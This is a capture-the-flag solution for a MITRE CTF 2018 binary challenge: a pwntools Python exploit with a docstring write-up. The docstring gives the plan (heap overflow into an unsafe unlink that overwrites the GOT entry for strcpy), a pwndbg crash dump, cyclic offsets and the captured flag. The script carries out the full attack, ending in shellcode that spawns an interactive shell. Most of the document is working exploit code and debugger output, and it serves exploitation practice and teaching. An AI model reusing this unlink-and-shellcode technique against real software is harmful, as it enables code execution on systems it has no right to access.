MITRE CTF 2018 Binary 500 solution
# -*- coding: utf-8 -*-
from pwn import *
'''
> x86, no protections
> Custom heap
> Out of bounds write
> Unsafe Unlink
> rwx heap+stack
struct chunk{
int size
* fd
* bk
space
}
Solution :
[+] Allocate a few chunks
[+] Overflow into the next chunk to replace fd and bk with GOT['strcpy'] and shellcode jump address.
[+] spray a region with asm("jmp dword[esp+8]")
[+] trigger strcpy with controlled parameter as shellcode
crash state
*EAX 0x61616168 ('haaa')
EBX 0x0
*ECX 0x0
*EDX 0x61616169 ('iaaa')
EDI 0xf7721000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
ESI 0xf7721000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
*EBP 0xff856518 —▸ 0xff856948 —▸ 0xff856d68 ◂— 0x0
*ESP 0xff856508 ◂— 0xa /* '\n' */
*EIP 0x8048c05 (free+51) ◂— mov dword ptr [eax + 8], edx
[────────────────────────────────────────────────────DISASM─────────────────────────────────────────────────────]
► 0x8048c05 <free+51> mov dword ptr [eax + 8], edx
0x8048c08 <free+54> cmp dword ptr [ebp - 0xc], 0
0x8048c0c <free+58> je free+69 <0x8048c17>
0x8048c17 <free+69> push dword ptr [ebp - 4]
0x8048c1a <free+72> call deflag_inuse <0x8048adf>
0x8048c1f <free+77> add esp, 4
0x8048c22 <free+80> jmp free+83 <0x8048c25>
0x8048c25 <free+83> leave
0x8048c26 <free+84> ret
0x8048c27 <read_line> push ebp
0x8048c28 <read_line+1> mov ebp, esp
[─────────────────────────────────────────────────────STACK─────────────────────────────────────────────────────]
00:0000│ esp 0xff856508 ◂— 0xa /* '\n' */
01:0004│ 0xff85650c ◂— 0x61616169 ('iaaa')
02:0008│ 0xff856510 ◂— 0x61616168 ('haaa')
03:000c│ 0xff856514 —▸ 0x950c43c ◂— 0x61616167 ('gaaa')
04:0010│ ebp 0xff856518 —▸ 0xff856948 —▸ 0xff856d68 ◂— 0x0
05:0014│ 0xff85651c —▸ 0x80486da (harvest_farm+130) ◂— add esp, 0x10
06:0018│ 0xff856520 —▸ 0x950c448 ◂— 0x6161616a ('jaaa')
07:001c│ 0xff856524 ◂— 0x4
[───────────────────────────────────────────────────BACKTRACE───────────────────────────────────────────────────]
► f 0 8048c05 free+51
f 1 80486da harvest_farm+130
f 2 80489fc main+247
f 3 f7587637 __libc_start_main+247
Program received signal SIGSEGV (fault address 0x61616170)
pwndbg> cyclic -l 0x61616168
28
pwndbg> cyclic -l 0x61616169
32
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x16 bytes:
'MCA{E80369241F67CE85}\n'
MCA{E80369241F67CE85}
'''
# 32-bit Linux target; debug log level prints every byte exchanged with the tube.
context.update(arch='i386', os='linux', log_level='debug')

e = ELF("./test")
# GOT slot that the unsafe-unlink write targets (see the module docstring).
write_here = e.got['strcpy']

# dirty hack
# $ socat TCP-LISTEN:5000,reuseaddr,fork EXEC:"ssh [email protected]"
s = remote(host="127.0.0.1", port=5000)
def malloc(n):
    """Select menu option 1 (allocate) and answer the size prompt with *n*."""
    exchange = (("> ", "1"), (": ", str(n)))
    for prompt, reply in exchange:
        s.recvuntil(prompt)
        s.sendline(reply)
def free(idx):
    """Select menu option 2 (free) and answer the index prompt with *idx*."""
    exchange = (("> ", "2"), (": ", str(idx)))
    for prompt, reply in exchange:
        s.recvuntil(prompt)
        s.sendline(reply)
def fill(idx, ctx):
    """Select menu option 3 (write) and answer its three prompts in order.

    The program asks for the chunk index, the byte count, and then the data
    itself; the count sent is always ``len(ctx)``.
    """
    s.recvuntil("> ")
    s.sendline("3")
    for reply in (str(idx), str(len(ctx)), str(ctx)):
        s.recvuntil(": ")
        s.sendline(reply)
# Writeup step 1: allocate a few chunks, all of the same size.
for _ in range(8):
    malloc(20)

# Writeup step 3: spray chunk 0 with the `jmp dword [esp+8]` stub.
fill(0, "\xff\x64\x24\x08" * 0x100)

# Writeup step 2: overflow past chunk 3 so the next chunk's fd/bk carry
# GOT['strcpy'] (offset 28 per the cyclic lookup in the docstring).
fill(3, cyclic(28) + p32(write_here - 8))

# Freeing chunk 4 triggers the unsafe unlink that writes the GOT entry.
free(4)

# Writeup step 4: the controlled strcpy argument is the shellcode.
fill(0, asm(shellcraft.i386.linux.sh()))
s.interactive()